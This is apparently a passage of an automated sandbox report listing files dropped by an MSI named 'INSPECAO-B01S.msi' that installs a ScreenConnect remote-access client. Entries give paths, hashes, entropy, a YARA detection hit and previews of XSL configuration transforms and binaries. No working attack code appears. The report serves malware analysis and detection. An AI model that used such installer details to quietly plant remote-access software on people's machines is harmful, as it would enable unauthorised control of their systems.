Preview:	<xsl:stylesheet version="2.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform" ...xmlns:msxsl="urn:schemas-microsoft-com:xslt"...exclude-result-prefixes="msxsl"..>...<xsl:output method="xml" omit-xml-declaration="yes"/>...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />..... basic identity transform -->...<xsl:template match="node()\|@">....<xsl:copy>.....<xsl:apply-templates select="node()\|@"/>....</xsl:copy>...</xsl:template>.....<xsl:variable name="EnableGuestRequireConsentToggle" select="configuration/ScreenConnect.UserInterfaceSettings/setting[@name='EnableGuestRequireConsentToggle']" />...<xsl:variable name="SupportLockMachineOnDisconnect" select="configuration/ScreenConnect.UserInterfaceSettings/setting[@name='SupportLockMachineOnDisconnect']" />...<xsl:variable name="AccessLockMachineOnDisconnect" select="configuration/ScreenConnect.UserInterfaceSettings/setting[@name='AccessLockMachineOnDisconnect']" />...<xsl:variable name="SupportLockMachine

C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\TransformClientOverrideResx.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	exported SGML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1135
Entropy (8bit):	5.055198370362517
Encrypted:	false
SSDEEP:	24:3qae8NW+OOt69ta9DAa9DtPMwrDAiFGrZs1BEU/q5rM/+01j:3qae8NW6SubtzAiFGrZC+IYrRqj
MD5:	7F75CED83D8C263A88A622A1E089B902
SHA1:	4C14858C78B556A0D1A02D596F74059944AE7865
SHA-256:	115937C6A57BFC17E1F9EA92C0C146DB44C803A449207FC77DD53CB0824DAA29
SHA-512:	C813C1D990DDAFE9B1A441791870A7238673E9CBA25CC044A6679EC2707323E3B91AEC6DE7CC14E434297B10DC33987D3C1FD7FDB2F742370F272C80FC01DA4C
Malicious:	false
Preview:	.<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" exclude-result-prefixes="msxsl">..<xsl:output method="xml" omit-xml-declaration="yes"/>...<xsl:template match="/root">....<xsl:copy>.....<xsl:apply-templates select="node()\|@" />.....<xsl:if test="count(data[@name='ApplicationDirectoryName']) = 0 and count(data[@name='ApplicationTitle']) > 0" xml:space="preserve"> <data name="ApplicationDirectoryName" xml:space="preserve">.. <value><xsl:value-of select="data[@name='ApplicationTitle']/value" /></value>.. </data>..</xsl:if>....</xsl:copy>...</xsl:template>...<xsl:template match="/root//node()\|@">....<xsl:copy>.....<xsl:apply-templates select="node()\|@*" />....</xsl:copy>...</xsl:template>... this should be handled with the updated xsl which accounts for missing input files -->... we originally took this out because the Xsl.exe was updated to handle missing files but it seems like we still need t

C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\TransformLicenseXml.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	exported SGML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1768
Entropy (8bit):	5.101132156143849
Encrypted:	false
SSDEEP:	48:3qagl80iEFFrbb2FbZb0FbfeAPd5p+3FsJvP95vJ2rFuFnrRPOQR:aji3ALemVP95vH9
MD5:	258C82001204536C091D6ABF60724339
SHA1:	1C71A8427C60C962D655AD5199F1D68A049EE549
SHA-256:	C7EA7315ED86E55D841CE665C02D119D1F054F810BE7EE346A268E10F5826957
SHA-512:	3A6187B53319D096915CAACE9D65F9D40CA04EB274849D8EB4C934FF709CD02E3912C6D22AE5695B9B25FD23C86D13C1B61BD39DCBCD0AF397988AF0393CA9D6
Malicious:	false
Preview:	.<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="urn:ScreenConnect" exclude-result-prefixes="msxsl user">...<xsl:param name="licenseSignatureKey" />...<xsl:param name="licenseID" />.....<msxsl:script language="C#" implements-prefix="user" xml:space="preserve">....<msxsl:assembly name="System.Configuration" />....<msxsl:assembly name="ScreenConnect.Windows" />....<msxsl:assembly name="ScreenConnect.Server" />....<msxsl:assembly name="ScreenConnect.Core" />....<msxsl:using namespace="ScreenConnect" />....<msxsl:using namespace="System.IO" />....<msxsl:using namespace="System.Xml.Serialization" />....<msxsl:using namespace="System.Text" />........public string GenerateLicenseXml(string licenseSignatureKey, string licenseID)....{.....var license = new CloudLicense { LicenseID = licenseID };.......var envelope = new LicenseEnvelope { Contents = license };.....envelope.Sign(Convert.FromBase64String(lice

C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\TransformOverriddenKeys.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	exported SGML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	629
Entropy (8bit):	5.130173870130788
Encrypted:	false
SSDEEP:	12:yhkVRoUFLjco4IMs/XCZsDJMtR99oRXbHmiioRXbHmiHIfISdXt:KKer7n9AHvHjSXv
MD5:	31908D4B70E384C9F4D42CB05A28A73C
SHA1:	7A69055E9EB8E482C009F12CF5E555585531663B
SHA-256:	3D8138FDD91F148DE65DC062A9A4BD9781449B5D8C526157C61A04BFD86255F2
SHA-512:	ED993EB8848E144085D9335D82CBC6DFE940F6649C972EC173883486899186E94EF69992457A221B37F9BE3934B629EE7F7965C2D7C671B97DB210AC060FD589
Malicious:	false
Preview:	<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">...<xsl:param name="baseFilePath" />..... basic identity transform -->...<xsl:template match="node()\|@">....<xsl:copy>.....<xsl:apply-templates select="node()\|@" />....</xsl:copy>...</xsl:template>.....<xsl:template match="/root/data">....<xsl:if test="count(document($baseFilePath)/root/data[@name = current()/@name]) != 0 and document($baseFilePath)/root/data[@name = current()/@name]/value != current()/value">.....<xsl:copy>......<xsl:apply-templates select="node()\|@*" />.....</xsl:copy>....</xsl:if>...</xsl:template>..</xsl:stylesheet>..

C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\TransformRoleXml.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	exported SGML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5837
Entropy (8bit):	5.223683802415461
Encrypted:	false
SSDEEP:	48:3RW/8dr71427K9y+mXrlREtoO8gSs0e2tx4u/h0MrlGEsoi3itx4u/h0frlyEBFC:hWW0wtGtUpe2nhbjsvynhaHBGnhMBbZY
MD5:	144ADC93F53E457A1BFFA5372FD3C09B
SHA1:	6B19BB56C3C2F6E761D16D42112B57BD5E50D49E
SHA-256:	D467FE93A43F887F3F5440F9C9B9C66739DF8C064FA6A467AA102123EEDBEB4B
SHA-512:	08CA5D41C46CCD09F7FDE4EE325A38F0AE215AD9003CC9F0AF2B70AD59AC0A9995217EAC6A749E0BCFCE24AA23C0F106A42F6C4D1D367FD82429BCE4468B7487
Malicious:	false
Preview:	.<xsl:stylesheet.version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"..>...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />..... basic identity transform -->...<xsl:template match="node()\|@">....<xsl:copy>.....<xsl:apply-templates select="node()\|@" />....</xsl:copy>...</xsl:template>..... identity transform for self-closing tags -->...<xsl:template match="[not(text()) and not()]">....<xsl:copy>.....<xsl:apply-templates select="@*" />....</xsl:copy>...</xsl:template>.....<xsl:template match="PermissionEntry[@OwnershipFilter!='OwnedAndUnowned' and @AccessControlType!='Deny']" />.....<xsl:template match="@xsi:type[.='SessionOwnershipPermissionEntry']">....<xsl:attribute name="xsi:type">SessionPermissionEntry</xsl:attribute>...</xsl:template>.....<xsl:template match="@OwnershipFilter" />.....<xsl:template match="@Name[.='EndSession']">....<xsl:attribute name="Name">DeleteSession</xs

C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\TransformSecurityEventTriggerXml.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	exported SGML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	741
Entropy (8bit):	5.169072715134804
Encrypted:	false
SSDEEP:	12:yJ6Va8io1rO4ej+QhFLjco4IMs/XCZFr5CyWi7s/XCZDSbn:xa8ZrO4ej+4er7ftC127N8n
MD5:	41DFF6114A921D7AC5637B8AC9F04DC4
SHA1:	03880D70FA6A268C040025E90BC767D572BA36A0
SHA-256:	2CEFD9DB01C7A6F8E33A7DADBF511E963E56FF87D18064BAB2E4FE2D00A95797
SHA-512:	FE12502B10B35EF09837A8DE8CC1D7A0A67AAFBEBAF2E6911302D3E4C2F0379DFFF41B476ECBED04F24083F4B80C779F6CD19CB69633C0D6C8A3CE27ABD78958
Malicious:	false
Preview:	<xsl:stylesheet version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"..>...<xsl:output omit-xml-declaration="yes" encoding="ASCII" />...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />...<xsl:param name="oldVersionBuild" />..... basic identity transform -->...<xsl:template match="node()\|@">....<xsl:copy>.....<xsl:apply-templates select="node()\|@" />....</xsl:copy>...</xsl:template>..... identity transform for self-closing tags -->...<xsl:template match="[not(text()) and not()]">....<xsl:copy>.....<xsl:apply-templates select="@*" />....</xsl:copy>...</xsl:template>..... no actual transforms for now -->....</xsl:stylesheet>..

C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\TransformSessionEventTriggerXml.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	Algol 68 source, ASCII text, with very long lines (14704), with CRLF line terminators
Category:	dropped
Size (bytes):	165735
Entropy (8bit):	4.0957845053651
Encrypted:	false
SSDEEP:	768:+aOZY/q3nv4eEPg8YFNHo9GHVIO35EiOGielK2pY/q3nv4eEPg8YFNHo9GHVI+3F:+aJ/CnQehCGHVt43/CnQehCGHVf1
MD5:	4D5B6FB68883C7842D5397D54E85ABC2
SHA1:	02DC58F27E440F02B5FC4872083C7DAFD2DD98C0
SHA-256:	6224B2FE77D2D9104E1BF79573CE1849C408744278DEEB198622FB28E46D80CE
SHA-512:	9398B8A85DD3B22B0F48AB05B8C9FF34C0B087BF49DF82320D93D1D52D4E26533A0EFA1BF0696DE4052A33AF0BAC824CC8A1F5998EEB5D25E438F9E4110622EF
Malicious:	false
Preview:	<xsl:stylesheet version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"...xmlns:msxsl="urn:schemas-microsoft-com:xslt"...xmlns:asm="urn:schemas-microsoft-com:asm.v1"...xmlns:user="urn:ScreenConnect"...exclude-result-prefixes="msxsl asm user"..>...<xsl:output omit-xml-declaration="yes" encoding="ASCII" />...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />...<xsl:param name="oldVersionBuild" />...<xsl:variable name="singleQuote">'</xsl:variable>.....<msxsl:script language="C#" implements-prefix="user">....<msxsl:using namespace="System.Text.RegularExpressions" />....<![CDATA[......public static string RegexReplace(string input, string pattern, string replacement)....{.....return Regex.Replace(input, pattern, replacement);....}.... ...</msxsl:script>..... basic identity transform -->...<xsl:template match="node()\|@">....<xsl:copy>.....<xsl:apply-templates select="node()\|@" />....</xsl:copy>

C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\TransformSessionGroupXml.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	Algol 68 source, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1564
Entropy (8bit):	5.254408929629647
Encrypted:	false
SSDEEP:	24:xa8gaRs7rO4ej+HLSEWucLxjUbNtBUU/Der7ftC127vwKwNwwkFEphRynS2n:E8gaRsTtogYq6r71427IbNxkFDSq
MD5:	26E0BFF9194950526A0BA294210BAF79
SHA1:	026D99742D35B1ECCB0DF29ECDA19CECE0387C88
SHA-256:	248DCA9B0706E95A2CBE18B4959ECCA5DFA2D4A77AADC66BF7BA9734757EF29C
SHA-512:	A3B29F916B29FE84DA5B4A9FB74BBCCB04781A0021C7C9EE4195D5D8024B9A5A7C64CDEF9AA98E10F1E68060E29E74677CD43002086FD76F3BAEB69B2147715B
Malicious:	false
Preview:	<xsl:stylesheet version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"...xmlns:msxsl="urn:schemas-microsoft-com:xslt"...xmlns:asm="urn:schemas-microsoft-com:asm.v1"...xmlns:user="urn:ScreenConnect"...exclude-result-prefixes="msxsl asm user"..>...<xsl:output omit-xml-declaration="yes" encoding="ASCII" />...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />...<xsl:param name="oldVersionBuild" />.....<msxsl:script language="C#" implements-prefix="user">....<msxsl:using namespace="System.Text.RegularExpressions" />..<![CDATA[......public static string RegexReplace(string input, string pattern, string replacement)....{.....return Regex.Replace(input, pattern, replacement);....}.... ...</msxsl:script>..... basic identity transform -->...<xsl:template match="node()\|@">....<xsl:copy>.....<xsl:apply-templates select="node()\|@" />....</xsl:copy>...</xsl:template>..... identity transform for sel

C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\TransformWebConfig.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	Algol 68 source, ASCII text, with very long lines (1649), with CRLF line terminators
Category:	dropped
Size (bytes):	42037
Entropy (8bit):	5.478811092639316
Encrypted:	false
SSDEEP:	768:E1YNsh5xxCuEfxBDyp818n4SIOaUUX4bwsfVdfdFNvwDxjLVO88RlUEjKRMX9HPk:E1VCuEfxBDyp818n4SPaUUIbwsfVdfdA
MD5:	3E2819DAE208FB16B35E83522C9E1E21
SHA1:	325D9AB2122FF9B41AE936326CD23A0CBCCD16BE
SHA-256:	6B93D87A6547CEDD4EE11EB7E9373963B89F98536A7F834D4564977306021554
SHA-512:	6D5388F35C0958ACE0EAFDF8E98A3125D2535AC25670C0E13EED6664E9D97B6B2ED48889FD07CE9B74C0E8923C0BB796C537B0F4EB5C76A85B1E24474367ED6F
Malicious:	false
Preview:	<xsl:stylesheet version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:msxsl="urn:schemas-microsoft-com:xslt"...xmlns:asm="urn:schemas-microsoft-com:asm.v1"...xmlns:user="urn:ScreenConnect"...exclude-result-prefixes="msxsl asm user"..>...<xsl:output omit-xml-declaration="yes" encoding="ASCII" />...<xsl:strip-space elements="add remove httpRuntime" />...<xsl:param name="configuration" />...<xsl:param name="platform" />...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />...<xsl:param name="version" />...<xsl:param name="utcOffsetMinuteCount" />..... NOTE: this only supports C# 2.0 and .NET Framework 2.0-->... Custom/XslScratchpad is setup with the same C#/.NET configuration to provide full IDE support, so changes should be made/tested there and then copied to this section -->...<msxsl:script language="C#" implements-prefix="user">....<msxsl:using namespace="System.Collections.Generic" />....<msxsl:using namespace="System.Security.Crypto

C:\Windows\Installer\4c1432.msi

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {87BA6F17-ED48-2213-B0B4-DE77D334918D}, Create Time/Date: Wed May 29 14:47:46 2024, Last Saved Time/Date: Wed May 29 14:47:46 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
Category:	dropped
Size (bytes):	8249344
Entropy (8bit):	7.949102976609468
Encrypted:	false
SSDEEP:	98304:gEnXkHywo+EVhaecMUzG4uc96ob2KEnXkHywo+EVhaecMUCEnXkHywo+EVhaecMk:rZs6Uruc9XboZs6UJZs6UgZs6U
MD5:	A41D8AA583E034822C084A74EAC45268
SHA1:	03E24D97759F550F5B261E552E7321DB478C2FF6
SHA-256:	7A004ABAE96E562926D9AF1CF9E323DE387923C24A0A6779D343B64537C4CC1B
SHA-512:	71C801134371AD7458E1BC023FB6F50B3AA01116B9316944D491254DB29BA811B855EC194810320B5B106701234D207D31A264F15A3D73305792F22CA49FD1B0
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\4c1434.msi

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {87BA6F17-ED48-2213-B0B4-DE77D334918D}, Create Time/Date: Wed May 29 14:47:46 2024, Last Saved Time/Date: Wed May 29 14:47:46 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
Category:	dropped
Size (bytes):	8249344
Entropy (8bit):	7.949102976609468
Encrypted:	false
SSDEEP:	98304:gEnXkHywo+EVhaecMUzG4uc96ob2KEnXkHywo+EVhaecMUCEnXkHywo+EVhaecMk:rZs6Uruc9XboZs6UJZs6UgZs6U
MD5:	A41D8AA583E034822C084A74EAC45268
SHA1:	03E24D97759F550F5B261E552E7321DB478C2FF6
SHA-256:	7A004ABAE96E562926D9AF1CF9E323DE387923C24A0A6779D343B64537C4CC1B
SHA-512:	71C801134371AD7458E1BC023FB6F50B3AA01116B9316944D491254DB29BA811B855EC194810320B5B106701234D207D31A264F15A3D73305792F22CA49FD1B0
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI15E7.tmp

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	423362
Entropy (8bit):	6.577227518290168
Encrypted:	false
SSDEEP:	6144:buH2aCGw1ST1wQLdqv5uH2aCGw1ST1wQLdqvI:buH2anwohwQUv5uH2anwohwQUvI
MD5:	C7A0E5DA1B246003CE184BA04031A14D
SHA1:	CABD45992B33888CFAC1992BC184607087C09BE3
SHA-256:	7D1E6C8C57BE946A0C0EB9019CAA06A072C2B9FD26EA53336CA8F9B8A9BD02AF
SHA-512:	53BE8BD1DE845AE2CD37AB3A17AB7D01D735089642157B51BCE820AF504EDA3D6CE68728119DB7A1B45C054D366EC35DD6C7B337A35CE855BCA2FF657D99CE31
Malicious:	false
Yara Hits:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI15E7.tmp, Author: Joe Security
Preview:	...@IXOS.@.....@%8[Y.@.....@.....@.....@.....@.....@......&.{87BA6F17-ED48-2213-B0B4-DE77D334918D}'.ScreenConnect Client (3a24aebb8959bcfa)..INSPECAO-B01S.msi.@.....@.....@.....@......DefaultIcon..&.{87BA6F17-ED48-2213-B0B4-DE77D334918D}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (3a24aebb8959bcfa)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{D42CA421-A3C1-15D6-4810-B6C0D604145C}^.C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{75EF4394-3270-ADB6-D593-0F8202C9237A}f.C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{915C500B-050C-F208-AC35-E6715450BEFD}c.C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsFileManager.exe.@.

C:\Windows\Installer\MSI1608.tmp

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	207360
Entropy (8bit):	6.573348437503042
Encrypted:	false
SSDEEP:	3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
MD5:	BA84DD4E0C1408828CCC1DE09F585EDA
SHA1:	E8E10065D479F8F591B9885EA8487BC673301298
SHA-256:	3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
SHA-512:	7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../....../......./......./.....n./...../../.../....../....../..-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI17AE.tmp

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	207360
Entropy (8bit):	6.573348437503042
Encrypted:	false
SSDEEP:	3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
MD5:	BA84DD4E0C1408828CCC1DE09F585EDA
SHA1:	E8E10065D479F8F591B9885EA8487BC673301298
SHA-256:	3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
SHA-512:	7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../....../......./......./.....n./...../../.../....../....../..-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\SourceHash{87BA6F17-ED48-2213-B0B4-DE77D334918D}

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.1654595977929678
Encrypted:	false
SSDEEP:	12:JSbX72FjrAGiLIlHVRpEh/7777777777777777777777777vDHFEYjUrl/l0i8Q:JNQI5U1DF
MD5:	A90A288AF71908B160C0FD1365C26527
SHA1:	24E66CD3C4764D624E75EA199BE90244FAEA74BD
SHA-256:	8BA661142915C0CF8BFCE6AD2EFA72F88623E3ACC8155FB8C699EE08C1B610EF
SHA-512:	C4497D8E4E41184958F50D3C5242812E35974C6EF43954DF13818DC6F34EF741F686AFD7FFE8F8404065B184F48BB8DDAE601554757505517D4691D0C1DBA60F
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.789631956260909
Encrypted:	false
SSDEEP:	48:38PhDuRc06WXJS/T5mN+nyqcq56AduNSi4+idRxNLr7Qn3wiz2+Oo8rGAduNSID+:2hD1J/TsWHpofedh/+/z
MD5:	03D56FFAA10A5A406A3D3AC9E162D5E2
SHA1:	E0542DE137FDDB1821079B26563B28EB64E10B9A
SHA-256:	A88E6E057AA15425DD78A091D2CBCAF9BF152E5A63F756B1D6B766FBCF12419B
SHA-512:	6FA628078449AB9C09D7ECFE177ED9DB4B8BC3383092C7576EB236489222D4DD32C17AC7D3EA56677ADA969C361834BCAB65DD1CD24BBD473BD320E2E3C231AD
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\{87BA6F17-ED48-2213-B0B4-DE77D334918D}\DefaultIcon

Process:	C:\Windows\System32\msiexec.exe
File Type:	MS Windows icon resource - 3 icons, 16x16 with PNG image data, 16 x 16, 8-bit colormap, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 32 x 32, 1-bit colormap, non-interlaced, 4 bits/pixel
Category:	dropped
Size (bytes):	435
Entropy (8bit):	5.289734780210945
Encrypted:	false
SSDEEP:	12:Kvv/7tghWPjScQZ/Ev/739Jgh5TZYR/v/71XfghNeZ:QOZZq9JOz0dONeZ
MD5:	F34D51C3C14D1B4840AE9FF6B70B5D2F
SHA1:	C761D3EF26929F173CEB2F8E01C6748EE2249A8A
SHA-256:	0DD459D166F037BB8E531EB2ECEB2B79DE8DBBD7597B05A03C40B9E23E51357A
SHA-512:	D6EEB5345A5A049A87BFBFBBBEBFBD9FBAEC7014DA41DB1C706E8B16DDEC31561679AAE9E8A0847098807412BD1306B9616C8E6FCFED8683B4F33BD05ADE38D1
Malicious:	false
Preview:	..............z...6... ..............00..........0....PNG........IHDR.............(-.S....PLTE....22.u......tRNS.@..f..."IDATx.c` .0"...$.(......SC..Q8....9b.i.Xa.....IEND.B`..PNG........IHDR... ... .....I......PLTE....22.u......tRNS.@..f...(IDATx.c`...... ... D.......vb.....A`..(.-s...q....IEND.B`..PNG........IHDR...0...0.....m.k.....PLTE....22.u......tRNS.@..f...+IDATx.c` .......Q...S.@..DQu...4...(.}DQD...3x........IEND.B`.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Process:	C:\Windows\System32\msiexec.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	432221
Entropy (8bit):	5.375175486082554
Encrypted:	false
SSDEEP:	1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgauo:zTtbmkExhMJCIpErN
MD5:	8D35922C3DFBD0BBED6FF3E5309A8B81
SHA1:	E4E0D8749539E4360A8E0795BB4E99404D4AB720
SHA-256:	D2619EF0B950CB468B247D349F1CD8DFC39B5B71191C8B4A1A0261546757F7B2
SHA-512:	CFB022D189885393F49001BE6CDA9F924DD060D80C3D444A19DCD58BC8223E464D00CC698330700C05BB7247C5E1B382241A53375B94301931D7757FB4ABF70C
Malicious:	false
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\0hs00sh4.newcfg

Process:	C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	584
Entropy (8bit):	5.04060637692126
Encrypted:	false
SSDEEP:	12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENONldAY8+iF1v/vXbAa3xT:2dL9hK6E46YPRd3QvH
MD5:	ED38B21960AA853FAAEDE86DF21C7A54
SHA1:	A1E62333989DA0DF9382D823134904EC2801A04A
SHA-256:	C929430389EBCCE74E1D37F28DB80FE3D33106E0AB61E7199B72B6E6241719E4
SHA-512:	8668217CEC1F14110E2BF3B3C0AD1301305E49EE5E9C32F5683287A84157DB7EC07359E057EFCB7FF0CDFBA14E4CC0F819B5F06055A24A32CDA1F95B74AF5F69
Malicious:	false
